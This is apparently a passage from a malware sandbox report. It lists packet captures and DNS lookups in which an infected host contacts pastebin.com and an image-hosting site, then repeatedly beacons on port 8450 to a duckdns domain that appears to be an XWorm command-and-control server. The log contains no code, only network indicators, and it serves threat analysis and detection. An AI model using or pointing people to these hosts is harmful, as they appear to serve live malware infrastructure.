May 4, 2024 09:48:41.927632093 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.927669048 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.927671909 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.927680969 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.927687883 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.927726984 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.928555012 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.928569078 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.928632021 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.928637981 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.928679943 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.929492950 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.929512024 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.929624081 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.929630041 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.929670095 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.930497885 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.930526972 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.930561066 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.930566072 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.930583000 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.930612087 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.931351900 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.931365967 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.931416988 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.931422949 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.931469917 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.932277918 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.932293892 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.932341099 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.932348967 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.932373047 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.933248043 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.933263063 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.933316946 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.933321953 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.933362007 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.934231997 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.934248924 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.934290886 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.934297085 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.934325933 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.934340000 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.935051918 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.935069084 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.935107946 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.935112953 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.935133934 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.935148001 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.935838938 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.935853004 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.935880899 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.935885906 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.935910940 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.935920954 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.936745882 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.936759949 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.936794996 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.936800957 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.936836004 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.937586069 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.937599897 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.937629938 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.937634945 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.937659025 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.937673092 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.938723087 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.938740969 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.938783884 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.938788891 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.938812017 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.938827038 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.939606905 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.939623117 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.939678907 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.939685106 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.939718962 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.940479994 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.940494061 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.940530062 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.940535069 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.940561056 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.940579891 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.941364050 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.941380024 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.941425085 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.941431046 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.941468000 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.942154884 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.942169905 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.942209005 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.942214966 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.942353010 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.943279982 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.943308115 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.943331957 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.943336964 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.943363905 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.943382978 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.944154024 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.944169044 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.944210052 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.944216013 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.944236994 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.944252014 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.944770098 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.944785118 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.944818020 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.944823027 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.944845915 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.944864035 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.945804119 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.945818901 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.945847988 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.945852995 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.945874929 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.945888996 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.946669102 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.946685076 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.946726084 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.946731091 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.946754932 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.946768999 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.947107077 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.947149038 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.947154045 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.947190046 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.947226048 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.947463989 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:46.964251041 CEST	49709	443	192.168.2.6	131.153.147.50
May 4, 2024 09:48:46.964299917 CEST	443	49709	131.153.147.50	192.168.2.6
May 4, 2024 09:48:46.964376926 CEST	49709	443	192.168.2.6	131.153.147.50
May 4, 2024 09:48:46.964813948 CEST	49709	443	192.168.2.6	131.153.147.50
May 4, 2024 09:48:46.964832067 CEST	443	49709	131.153.147.50	192.168.2.6
May 4, 2024 09:48:47.404820919 CEST	443	49709	131.153.147.50	192.168.2.6
May 4, 2024 09:48:47.404963970 CEST	49709	443	192.168.2.6	131.153.147.50
May 4, 2024 09:48:47.406821012 CEST	49709	443	192.168.2.6	131.153.147.50
May 4, 2024 09:48:47.406845093 CEST	443	49709	131.153.147.50	192.168.2.6
May 4, 2024 09:48:47.407139063 CEST	443	49709	131.153.147.50	192.168.2.6
May 4, 2024 09:48:47.408119917 CEST	49709	443	192.168.2.6	131.153.147.50
May 4, 2024 09:48:47.452148914 CEST	443	49709	131.153.147.50	192.168.2.6
May 4, 2024 09:48:47.830945015 CEST	443	49709	131.153.147.50	192.168.2.6
May 4, 2024 09:48:47.830971003 CEST	443	49709	131.153.147.50	192.168.2.6
May 4, 2024 09:48:47.831038952 CEST	49709	443	192.168.2.6	131.153.147.50
May 4, 2024 09:48:47.831067085 CEST	443	49709	131.153.147.50	192.168.2.6
May 4, 2024 09:48:47.875596046 CEST	49709	443	192.168.2.6	131.153.147.50
May 4, 2024 09:48:48.045609951 CEST	443	49709	131.153.147.50	192.168.2.6
May 4, 2024 09:48:48.045622110 CEST	443	49709	131.153.147.50	192.168.2.6
May 4, 2024 09:48:48.045664072 CEST	443	49709	131.153.147.50	192.168.2.6
May 4, 2024 09:48:48.045754910 CEST	49709	443	192.168.2.6	131.153.147.50
May 4, 2024 09:48:48.045783997 CEST	443	49709	131.153.147.50	192.168.2.6
May 4, 2024 09:48:48.045811892 CEST	49709	443	192.168.2.6	131.153.147.50
May 4, 2024 09:48:48.045818090 CEST	443	49709	131.153.147.50	192.168.2.6
May 4, 2024 09:48:48.045842886 CEST	49709	443	192.168.2.6	131.153.147.50
May 4, 2024 09:48:48.089947939 CEST	443	49709	131.153.147.50	192.168.2.6
May 4, 2024 09:48:48.090065956 CEST	49709	443	192.168.2.6	131.153.147.50
May 4, 2024 09:48:48.090081930 CEST	443	49709	131.153.147.50	192.168.2.6
May 4, 2024 09:48:48.141225100 CEST	49709	443	192.168.2.6	131.153.147.50
May 4, 2024 09:48:48.260188103 CEST	443	49709	131.153.147.50	192.168.2.6
May 4, 2024 09:48:48.260199070 CEST	443	49709	131.153.147.50	192.168.2.6
May 4, 2024 09:48:48.260231972 CEST	443	49709	131.153.147.50	192.168.2.6
May 4, 2024 09:48:48.260277033 CEST	443	49709	131.153.147.50	192.168.2.6
May 4, 2024 09:48:48.260294914 CEST	49709	443	192.168.2.6	131.153.147.50
May 4, 2024 09:48:48.260341883 CEST	49709	443	192.168.2.6	131.153.147.50
May 4, 2024 09:48:48.260730982 CEST	49709	443	192.168.2.6	131.153.147.50
May 4, 2024 09:48:50.415188074 CEST	49710	8450	192.168.2.6	12.221.146.138
May 4, 2024 09:48:50.761368036 CEST	8450	49710	12.221.146.138	192.168.2.6
May 4, 2024 09:48:51.266257048 CEST	49710	8450	192.168.2.6	12.221.146.138
May 4, 2024 09:48:51.613279104 CEST	8450	49710	12.221.146.138	192.168.2.6
May 4, 2024 09:48:52.125588894 CEST	49710	8450	192.168.2.6	12.221.146.138
May 4, 2024 09:48:52.471534967 CEST	8450	49710	12.221.146.138	192.168.2.6
May 4, 2024 09:48:52.984987020 CEST	49710	8450	192.168.2.6	12.221.146.138
May 4, 2024 09:48:53.331022024 CEST	8450	49710	12.221.146.138	192.168.2.6
May 4, 2024 09:48:53.891241074 CEST	49710	8450	192.168.2.6	12.221.146.138
May 4, 2024 09:48:54.238919020 CEST	8450	49710	12.221.146.138	192.168.2.6
May 4, 2024 09:48:54.345568895 CEST	49712	8450	192.168.2.6	12.221.146.138
May 4, 2024 09:48:54.691714048 CEST	8450	49712	12.221.146.138	192.168.2.6
May 4, 2024 09:48:55.320270061 CEST	49712	8450	192.168.2.6	12.221.146.138
May 4, 2024 09:48:55.666820049 CEST	8450	49712	12.221.146.138	192.168.2.6
May 4, 2024 09:48:56.169404030 CEST	49712	8450	192.168.2.6	12.221.146.138
May 4, 2024 09:48:56.516849041 CEST	8450	49712	12.221.146.138	192.168.2.6
May 4, 2024 09:48:57.063097954 CEST	49712	8450	192.168.2.6	12.221.146.138
May 4, 2024 09:48:57.409533978 CEST	8450	49712	12.221.146.138	192.168.2.6
May 4, 2024 09:48:57.969398022 CEST	49712	8450	192.168.2.6	12.221.146.138
May 4, 2024 09:48:58.319048882 CEST	8450	49712	12.221.146.138	192.168.2.6
May 4, 2024 09:48:58.432001114 CEST	49713	8450	192.168.2.6	12.221.146.138
May 4, 2024 09:48:58.777297974 CEST	8450	49713	12.221.146.138	192.168.2.6
May 4, 2024 09:48:59.297465086 CEST	49713	8450	192.168.2.6	12.221.146.138
May 4, 2024 09:48:59.642615080 CEST	8450	49713	12.221.146.138	192.168.2.6
May 4, 2024 09:49:00.297503948 CEST	49713	8450	192.168.2.6	12.221.146.138
May 4, 2024 09:49:00.642915964 CEST	8450	49713	12.221.146.138	192.168.2.6
May 4, 2024 09:49:01.297498941 CEST	49713	8450	192.168.2.6	12.221.146.138
May 4, 2024 09:49:01.642966986 CEST	8450	49713	12.221.146.138	192.168.2.6
May 4, 2024 09:49:02.203771114 CEST	49713	8450	192.168.2.6	12.221.146.138
May 4, 2024 09:49:02.549149036 CEST	8450	49713	12.221.146.138	192.168.2.6
May 4, 2024 09:49:02.658330917 CEST	49715	8450	192.168.2.6	12.221.146.138
May 4, 2024 09:49:03.003577948 CEST	8450	49715	12.221.146.138	192.168.2.6
May 4, 2024 09:49:03.594347954 CEST	49715	8450	192.168.2.6	12.221.146.138
May 4, 2024 09:49:03.939960003 CEST	8450	49715	12.221.146.138	192.168.2.6
May 4, 2024 09:49:04.485037088 CEST	49715	8450	192.168.2.6	12.221.146.138
May 4, 2024 09:49:04.830741882 CEST	8450	49715	12.221.146.138	192.168.2.6
May 4, 2024 09:49:05.344367981 CEST	49715	8450	192.168.2.6	12.221.146.138
May 4, 2024 09:49:05.691068888 CEST	8450	49715	12.221.146.138	192.168.2.6
May 4, 2024 09:49:06.203900099 CEST	49715	8450	192.168.2.6	12.221.146.138
May 4, 2024 09:49:12.338628054 CEST	49716	8450	192.168.2.6	12.221.146.138
May 4, 2024 09:49:12.686723948 CEST	8450	49716	12.221.146.138	192.168.2.6
May 4, 2024 09:49:13.188122034 CEST	49716	8450	192.168.2.6	12.221.146.138
May 4, 2024 09:49:13.534492970 CEST	8450	49716	12.221.146.138	192.168.2.6
May 4, 2024 09:49:14.203722954 CEST	49716	8450	192.168.2.6	12.221.146.138
May 4, 2024 09:49:14.549802065 CEST	8450	49716	12.221.146.138	192.168.2.6
May 4, 2024 09:49:15.063107014 CEST	49716	8450	192.168.2.6	12.221.146.138
May 4, 2024 09:49:15.409249067 CEST	8450	49716	12.221.146.138	192.168.2.6
May 4, 2024 09:49:15.938105106 CEST	49716	8450	192.168.2.6	12.221.146.138
May 4, 2024 09:49:16.285630941 CEST	8450	49716	12.221.146.138	192.168.2.6
May 4, 2024 09:49:16.594795942 CEST	49717	8450	192.168.2.6	12.221.146.138
May 4, 2024 09:49:16.943943977 CEST	8450	49717	12.221.146.138	192.168.2.6
May 4, 2024 09:49:17.469384909 CEST	49717	8450	192.168.2.6	12.221.146.138
May 4, 2024 09:49:17.815401077 CEST	8450	49717	12.221.146.138	192.168.2.6
May 4, 2024 09:49:18.360140085 CEST	49717	8450	192.168.2.6	12.221.146.138
May 4, 2024 09:49:18.705466032 CEST	8450	49717	12.221.146.138	192.168.2.6
May 4, 2024 09:49:19.359993935 CEST	49717	8450	192.168.2.6	12.221.146.138
May 4, 2024 09:49:19.711015940 CEST	8450	49717	12.221.146.138	192.168.2.6
May 4, 2024 09:49:20.359981060 CEST	49717	8450	192.168.2.6	12.221.146.138
May 4, 2024 09:49:20.707469940 CEST	8450	49717	12.221.146.138	192.168.2.6
May 4, 2024 09:49:21.522327900 CEST	49718	8450	192.168.2.6	12.221.146.138
May 4, 2024 09:49:21.868540049 CEST	8450	49718	12.221.146.138	192.168.2.6
May 4, 2024 09:49:22.548871994 CEST	49718	8450	192.168.2.6	12.221.146.138
May 4, 2024 09:49:22.895522118 CEST	8450	49718	12.221.146.138	192.168.2.6
May 4, 2024 09:49:23.453775883 CEST	49718	8450	192.168.2.6	12.221.146.138
May 4, 2024 09:49:23.799901962 CEST	8450	49718	12.221.146.138	192.168.2.6
May 4, 2024 09:49:24.360009909 CEST	49718	8450	192.168.2.6	12.221.146.138
May 4, 2024 09:49:24.706068993 CEST	8450	49718	12.221.146.138	192.168.2.6
May 4, 2024 09:49:25.360033035 CEST	49718	8450	192.168.2.6	12.221.146.138
May 4, 2024 09:49:25.706811905 CEST	8450	49718	12.221.146.138	192.168.2.6
May 4, 2024 09:49:30.485591888 CEST	49719	8450	192.168.2.6	12.221.146.138
May 4, 2024 09:49:30.835231066 CEST	8450	49719	12.221.146.138	192.168.2.6
May 4, 2024 09:49:31.359998941 CEST	49719	8450	192.168.2.6	12.221.146.138
May 4, 2024 09:49:31.707602024 CEST	8450	49719	12.221.146.138	192.168.2.6
May 4, 2024 09:49:32.359988928 CEST	49719	8450	192.168.2.6	12.221.146.138
May 4, 2024 09:49:32.706062078 CEST	8450	49719	12.221.146.138	192.168.2.6
May 4, 2024 09:49:33.359960079 CEST	49719	8450	192.168.2.6	12.221.146.138
May 4, 2024 09:49:33.706285000 CEST	8450	49719	12.221.146.138	192.168.2.6
May 4, 2024 09:49:34.360049963 CEST	49719	8450	192.168.2.6	12.221.146.138
May 4, 2024 09:49:34.708230019 CEST	8450	49719	12.221.146.138	192.168.2.6
May 4, 2024 09:49:38.002093077 CEST	49720	8450	192.168.2.6	12.221.146.138
May 4, 2024 09:49:38.350728989 CEST	8450	49720	12.221.146.138	192.168.2.6
May 4, 2024 09:49:38.859992981 CEST	49720	8450	192.168.2.6	12.221.146.138
May 4, 2024 09:49:39.205740929 CEST	8450	49720	12.221.146.138	192.168.2.6
May 4, 2024 09:49:39.859987020 CEST	49720	8450	192.168.2.6	12.221.146.138
May 4, 2024 09:49:40.205679893 CEST	8450	49720	12.221.146.138	192.168.2.6
May 4, 2024 09:49:40.860069036 CEST	49720	8450	192.168.2.6	12.221.146.138
May 4, 2024 09:49:41.205853939 CEST	8450	49720	12.221.146.138	192.168.2.6
May 4, 2024 09:49:41.859987974 CEST	49720	8450	192.168.2.6	12.221.146.138
May 4, 2024 09:49:42.205708027 CEST	8450	49720	12.221.146.138	192.168.2.6
May 4, 2024 09:49:42.314441919 CEST	49721	8450	192.168.2.6	12.221.146.138
May 4, 2024 09:49:42.660161972 CEST	8450	49721	12.221.146.138	192.168.2.6
May 4, 2024 09:49:43.172463894 CEST	49721	8450	192.168.2.6	12.221.146.138
May 4, 2024 09:49:43.518887997 CEST	8450	49721	12.221.146.138	192.168.2.6
May 4, 2024 09:49:44.031881094 CEST	49721	8450	192.168.2.6	12.221.146.138
May 4, 2024 09:49:44.377113104 CEST	8450	49721	12.221.146.138	192.168.2.6
May 4, 2024 09:49:44.891221046 CEST	49721	8450	192.168.2.6	12.221.146.138
May 4, 2024 09:49:45.236510038 CEST	8450	49721	12.221.146.138	192.168.2.6
May 4, 2024 09:49:45.750591993 CEST	49721	8450	192.168.2.6	12.221.146.138
May 4, 2024 09:49:46.096535921 CEST	8450	49721	12.221.146.138	192.168.2.6
May 4, 2024 09:49:46.205208063 CEST	49722	8450	192.168.2.6	12.221.146.138
May 4, 2024 09:49:46.550575972 CEST	8450	49722	12.221.146.138	192.168.2.6
May 4, 2024 09:49:47.172513962 CEST	49722	8450	192.168.2.6	12.221.146.138
May 4, 2024 09:49:47.518965006 CEST	8450	49722	12.221.146.138	192.168.2.6
May 4, 2024 09:49:48.032001972 CEST	49722	8450	192.168.2.6	12.221.146.138
May 4, 2024 09:49:48.381756067 CEST	8450	49722	12.221.146.138	192.168.2.6
May 4, 2024 09:49:48.891315937 CEST	49722	8450	192.168.2.6	12.221.146.138
May 4, 2024 09:49:49.236562014 CEST	8450	49722	12.221.146.138	192.168.2.6
May 4, 2024 09:49:49.750740051 CEST	49722	8450	192.168.2.6	12.221.146.138
May 4, 2024 09:49:50.096160889 CEST	8450	49722	12.221.146.138	192.168.2.6
May 4, 2024 09:49:50.444768906 CEST	49723	8450	192.168.2.6	12.221.146.138
May 4, 2024 09:49:50.790256023 CEST	8450	49723	12.221.146.138	192.168.2.6
May 4, 2024 09:49:51.297547102 CEST	49723	8450	192.168.2.6	12.221.146.138
May 4, 2024 09:49:51.646255970 CEST	8450	49723	12.221.146.138	192.168.2.6
May 4, 2024 09:49:52.156903982 CEST	49723	8450	192.168.2.6	12.221.146.138
May 4, 2024 09:49:52.502338886 CEST	8450	49723	12.221.146.138	192.168.2.6
May 4, 2024 09:49:53.016225100 CEST	49723	8450	192.168.2.6	12.221.146.138
May 4, 2024 09:49:53.364576101 CEST	8450	49723	12.221.146.138	192.168.2.6
May 4, 2024 09:49:53.875608921 CEST	49723	8450	192.168.2.6	12.221.146.138
May 4, 2024 09:49:54.221065044 CEST	8450	49723	12.221.146.138	192.168.2.6
May 4, 2024 09:49:58.034532070 CEST	49724	8450	192.168.2.6	12.221.146.138
May 4, 2024 09:49:58.381827116 CEST	8450	49724	12.221.146.138	192.168.2.6
May 4, 2024 09:49:58.891266108 CEST	49724	8450	192.168.2.6	12.221.146.138
May 4, 2024 09:49:59.240672112 CEST	8450	49724	12.221.146.138	192.168.2.6
May 4, 2024 09:49:59.766249895 CEST	49724	8450	192.168.2.6	12.221.146.138
May 4, 2024 09:50:00.114187002 CEST	8450	49724	12.221.146.138	192.168.2.6
May 4, 2024 09:50:00.625854015 CEST	49724	8450	192.168.2.6	12.221.146.138
May 4, 2024 09:50:00.976340055 CEST	8450	49724	12.221.146.138	192.168.2.6
May 4, 2024 09:50:01.485011101 CEST	49724	8450	192.168.2.6	12.221.146.138
May 4, 2024 09:50:01.832496881 CEST	8450	49724	12.221.146.138	192.168.2.6
May 4, 2024 09:50:05.372176886 CEST	49725	8450	192.168.2.6	12.221.146.138
May 4, 2024 09:50:05.717458963 CEST	8450	49725	12.221.146.138	192.168.2.6
May 4, 2024 09:50:06.219422102 CEST	49725	8450	192.168.2.6	12.221.146.138
May 4, 2024 09:50:06.564838886 CEST	8450	49725	12.221.146.138	192.168.2.6
May 4, 2024 09:50:07.075242996 CEST	49725	8450	192.168.2.6	12.221.146.138
May 4, 2024 09:50:07.420762062 CEST	8450	49725	12.221.146.138	192.168.2.6
May 4, 2024 09:50:07.922524929 CEST	49725	8450	192.168.2.6	12.221.146.138
May 4, 2024 09:50:08.272244930 CEST	8450	49725	12.221.146.138	192.168.2.6
May 4, 2024 09:50:08.781835079 CEST	49725	8450	192.168.2.6	12.221.146.138
May 4, 2024 09:50:09.128638029 CEST	8450	49725	12.221.146.138	192.168.2.6

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 4, 2024 09:48:21.630450010 CEST	60435	53	192.168.2.6	1.1.1.1
May 4, 2024 09:48:21.790868044 CEST	53	60435	1.1.1.1	192.168.2.6
May 4, 2024 09:48:37.218208075 CEST	52684	53	192.168.2.6	1.1.1.1
May 4, 2024 09:48:37.516179085 CEST	53	52684	1.1.1.1	192.168.2.6
May 4, 2024 09:48:46.378576994 CEST	52457	53	192.168.2.6	1.1.1.1
May 4, 2024 09:48:46.963108063 CEST	53	52457	1.1.1.1	192.168.2.6
May 4, 2024 09:48:50.175225019 CEST	59117	53	192.168.2.6	1.1.1.1
May 4, 2024 09:48:50.412899017 CEST	53	59117	1.1.1.1	192.168.2.6
May 4, 2024 09:49:50.205037117 CEST	58580	53	192.168.2.6	1.1.1.1
May 4, 2024 09:49:50.443730116 CEST	53	58580	1.1.1.1	192.168.2.6

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
May 4, 2024 09:48:21.630450010 CEST	192.168.2.6	1.1.1.1	0x74f9	Standard query (0)	pastebin.com	A (IP address)	IN (0x0001)	false
May 4, 2024 09:48:37.218208075 CEST	192.168.2.6	1.1.1.1	0x9ac9	Standard query (0)	uploaddeimagens.com.br	A (IP address)	IN (0x0001)	false
May 4, 2024 09:48:46.378576994 CEST	192.168.2.6	1.1.1.1	0x140d	Standard query (0)	www.evolve27.com	A (IP address)	IN (0x0001)	false
May 4, 2024 09:48:50.175225019 CEST	192.168.2.6	1.1.1.1	0x9ff	Standard query (0)	xwormay8450.duckdns.org	A (IP address)	IN (0x0001)	false
May 4, 2024 09:49:50.205037117 CEST	192.168.2.6	1.1.1.1	0x25b6	Standard query (0)	xwormay8450.duckdns.org	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
May 4, 2024 09:48:21.790868044 CEST	1.1.1.1	192.168.2.6	0x74f9	No error (0)	pastebin.com		172.67.19.24	A (IP address)	IN (0x0001)	false
May 4, 2024 09:48:21.790868044 CEST	1.1.1.1	192.168.2.6	0x74f9	No error (0)	pastebin.com		104.20.3.235	A (IP address)	IN (0x0001)	false
May 4, 2024 09:48:21.790868044 CEST	1.1.1.1	192.168.2.6	0x74f9	No error (0)	pastebin.com		104.20.4.235	A (IP address)	IN (0x0001)	false
May 4, 2024 09:48:37.516179085 CEST	1.1.1.1	192.168.2.6	0x9ac9	No error (0)	uploaddeimagens.com.br		172.67.215.45	A (IP address)	IN (0x0001)	false
May 4, 2024 09:48:37.516179085 CEST	1.1.1.1	192.168.2.6	0x9ac9	No error (0)	uploaddeimagens.com.br		104.21.45.138	A (IP address)	IN (0x0001)	false
May 4, 2024 09:48:46.963108063 CEST	1.1.1.1	192.168.2.6	0x140d	No error (0)	www.evolve27.com	evolve27.com		CNAME (Canonical name)	IN (0x0001)	false
May 4, 2024 09:48:46.963108063 CEST	1.1.1.1	192.168.2.6	0x140d	No error (0)	evolve27.com		131.153.147.50	A (IP address)	IN (0x0001)	false
May 4, 2024 09:48:50.412899017 CEST	1.1.1.1	192.168.2.6	0x9ff	No error (0)	xwormay8450.duckdns.org		12.221.146.138	A (IP address)	IN (0x0001)	false
May 4, 2024 09:49:50.443730116 CEST	1.1.1.1	192.168.2.6	0x25b6	No error (0)	xwormay8450.duckdns.org		12.221.146.138	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

pastebin.com

